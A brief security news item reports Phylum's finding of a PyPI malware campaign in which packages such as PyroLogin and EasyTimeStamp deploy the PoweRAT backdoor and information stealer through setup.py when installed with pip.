Phylum, a software supply chain security company, has identified a malicious attack utilizing the PoweRAT backdoor and information stealer against Python Package Index (PyPI) users. The campaign was first discovered on December 22, 2022, when PyroLogin, a malicious Python package made to fetch code from a remote server and silently execute it, was discovered.
The EasyTimeStamp, Discorder, Discord-dev, Style.py, and PythonStyles packages all contained code that was similar to PyroLogin, and they were all published to PyPI between December 28 and December 31. The infection chain starts with a setup.py file, which means that the malware is automatically deployed if the malicious packages are installed using Pip.
The infection chain involves the execution of numerous scripts and the exploitation of legitimate operating system features.
Read More: PyPI Users Targeted With PoweRAT Malware